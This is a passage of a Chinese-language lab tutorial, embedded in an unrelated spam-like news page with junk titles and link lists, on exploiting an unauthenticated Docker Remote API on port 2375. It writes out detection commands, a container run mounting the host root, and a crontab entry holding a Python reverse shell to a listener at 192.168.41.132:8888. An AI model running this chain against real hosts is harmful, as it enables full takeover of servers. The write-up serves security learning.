当前位置: 首页 > news >正文

红木家具网站建设总体规划addfilter wordpress

news 2025/9/17 13:23:53
红木家具网站建设总体规划,addfilter wordpress,响应式网页设计图片,东莞人才招聘网58Docker Remote API 未授权访问逃逸 基础知识 Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致未授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以…

Docker Remote API 未授权访问逃逸

基础知识

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API,其默认绑定2375端口,如管理员对其配置不当可导致未授权访问漏洞。攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,可导致敏感信息泄露,甚至可进一步利用Docker自身特性,借助容器逃逸,最终完全控制宿主服务器

Docker daemon 是 Docker 引擎的后台进程,也称为 Dockerd。它是一个长时间运行的进程,负责管理 Docker 镜像、容器、网络和存储等各种资源,并提供一个 API 以供 Docker 客户端进行交互

当您在 Docker 主机上使用 Docker 命令时(例如 docker run),Docker 客户端将向 Docker daemon 发送命令请求,并通过 Docker API 进行通信。Docker daemon 接收并解析这些请求,并在其内部管理对象存储中创建、修改或删除相应的 Docker 资源。随后,Docker daemon 将响应结果发送回客户端,然后等待下一个命令请求

另外,Docker daemon 也负责监视 Docker 主机上正在运行的容器和服务,以及处理与 Docker 网络和存储相关的操作。它还可以与其他 Docker daemon 进行通信,以实现跨主机的镜像和容器管理。总之,Docker daemon 是整个 Docker 引擎的核心组件,负责实现 Docker 的各种功能,并将其暴露给用户和其他程序使用

环境搭建

首先我们执行如下的代码将 docker 守护进程监听在 0.0.0.0

dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock
  • -H=0.0.0.0:2375:指定 Docker daemon 监听的 TCP 端点地址和端口号。0.0.0.0 表示绑定到任何可用网络接口上,即允许从其他主机上的容器或者计算机上运行的 Docker 客户端连接。2375 是 Dockerdaemon 监听的端口号
  • -H unix:///var/run/docker.sock:指定 Docker daemon 监听的 Unix 域套接字路径,即 /var/run/docker.sock

​ 运行这个命令,Docker daemon 将同时监听 TCP 端点和 Unix 域套接字,并且没有安全保护

在这里插入图片描述

执行后出现上面错误是由于当前环境docker已经在运行中了,需要先停止docker

systemctl stop docker

在执行下面的命令

dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock

在这里插入图片描述

通过攻击机查看靶机所安装的镜像

docker -H tcp://IP:2375 images

在这里插入图片描述

漏洞检测

访问 http 请求 curl 192.168.41.132:2375/info,如果返回内容含有DockerRootDir等字符,则证明存在docker未授权访问漏洞

curl 192.168.41.132:2375/info | grep DockerRootDir

在这里插入图片描述

或者输入如下的命令

IP=`hostname -i | awk -F. '{print $1 "." $2 "." $3 ".1"}' ` && wget http://$IP:2375

如果返回 404 说明漏洞存在

在这里插入图片描述

漏洞复现

攻击机运行以下的命令查看对方的容器

docker -H tcp://<target>:2375 ps -a

在这里插入图片描述

新运行一个容器,挂载点设置为服务器的根目录挂载至/mnt目录下,此时修改/mnt/etc/crontab相当于修改/etc/crontab文件

docker -H tcp://192.168.41.132:2375 run -it -v /:/mnt nginx:latest /bin/bash

在这里插入图片描述

在容器内执行命令,将反弹shell的脚本写入到/etc/crontab文件

echo -e "* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.41.132\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /mnt/etc/crontab

在这里插入图片描述

在攻击开启监听

nc -lvvp 8888

在这里插入图片描述

等待一分钟过后,攻击机收到反弹shell

在这里插入图片描述

http://www.yayakq.cn/news/606324/

相关文章:

  • 苏州网站开发的企业外贸和网站制作
  • 建个大型网站需著名的国外设计网站有哪些
  • wordpress 中介网站asp网站建设代码
  • 做摄影网站的目的手机html编辑器
  • 网站功防教程网站怎么做图片轮播
  • 做网站需要多少电脑办公软件培训班
  • wap网站开发实例网页升级访问通知天天更新
  • 广西seowordpress优化图片分离
  • 建设机械网站方案酷站百分百
  • 建设电影会员网站天津seo建站
  • 优秀企业网站建设wordpress媒体库创建文件夹
  • 网红营销对消费者的影响大连做网站优化
  • 500强企业网站有哪些域名查询备案
  • 在线做投资网站个人网站建设中代码下载
  • 网站有域名怎么和做的网页链接php网页设计实例代码
  • 怎样上传图片到自己公司网站做网红用哪个网站
  • 做国外营销型网站wordpress 自定义 类别
  • 自己做的网站出现500错误怎么解决公司网站域名怎么续费
  • 哪些网站可以做国外生意方庄网站建设
  • 东莞模具网站建设wordpress显示标题和seo标题
  • 域名申请网页制作网站建设南宁网站排名优化公司哪家好
  • 浏阳网站开发公司物流网站推广怎么做
  • 网站文章排版工具旅游网站开发说明
  • 烟台网站优化公司wordpress清除主题信息
  • 网站禁止ip访问家具网站asp
  • 为什么织梦做的网站容易被攻击研发外包
  • 东莞公司网站设计网站教程dw
  • 常州建设局考试网站网站开发建设需要什么
  • 腾讯学生服务器做网站php mysql视频网站开发
  • 企业建一个网站需要多少钱济南建设网站 概况